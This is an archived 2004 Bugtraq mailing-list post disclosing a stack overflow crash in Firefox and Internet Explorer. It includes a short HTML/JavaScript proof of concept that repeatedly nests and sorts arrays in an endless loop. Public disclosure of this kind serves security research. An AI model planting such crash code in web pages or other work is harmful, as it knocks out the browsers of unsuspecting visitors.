[37505] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

FIREFOX flaws: nested array sort() loop Stack overflow exception

daemon@ATHENA.MIT.EDU (Berend-Jan Wever)
Thu Nov 25 12:08:56 2004

Message-ID: <000f01c4d28a$c217b570$0100a8c0@grotedoos>
From: "Berend-Jan Wever" <skylined@edup.tudelft.nl>
To: <full-disclosure@lists.netsys.com>, <vuln-dev@securityfocus.com>,
        <bugtraq@securityfocus.com>
Date: Thu, 25 Nov 2004 02:04:44 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Hi all,

Same flaw works for Firefox as well as MSIE:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course "how to write a bug report" and go through all that bugzilla crap.

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[37505] in bugtraq

FIREFOX flaws: nested array sort() loop Stack overflow exception

daemon@ATHENA.MIT.EDU (Berend-Jan Wever)Thu Nov 25 12:08:56 2004

daemon@ATHENA.MIT.EDU (Berend-Jan Wever)
Thu Nov 25 12:08:56 2004